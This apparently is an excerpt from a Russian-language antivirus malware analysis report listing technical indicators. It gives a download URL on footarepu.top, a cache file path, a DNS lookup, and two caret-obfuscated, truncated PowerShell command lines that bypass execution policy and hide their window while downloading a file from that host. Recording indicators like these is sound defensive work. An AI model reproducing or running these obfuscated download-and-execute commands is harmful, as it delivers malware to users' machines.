Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^w^ErshEL^L.E^xE -exe^CUT^iOnP^oL^icy ^BYpA^SS -N^o^PRO^F^IlE^ ^-W^in^DowStY^L^e ^hiDdEn (NE^w-O^BJe^CT S^y^sTe^M^.^n^E^t^.W^Eb^C^LiENT).doWNLOaDFIlE^('http://footarepu.top/read....
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "po^w^ErshEL^L.E^xE -exe^CUT^iOnP^oL^icy ^BYpA^SS -N^o^PRO^F^IlE^ ^-W^in^DowStY^L^e ^hiDdEn (NE^w-O^BJe^CT S^y^sTe^M^.^n^E^t^.W^Eb^C^LiENT).doWNLOaDFIlE^('http://footarepu.top/read.... (со скрытым окном)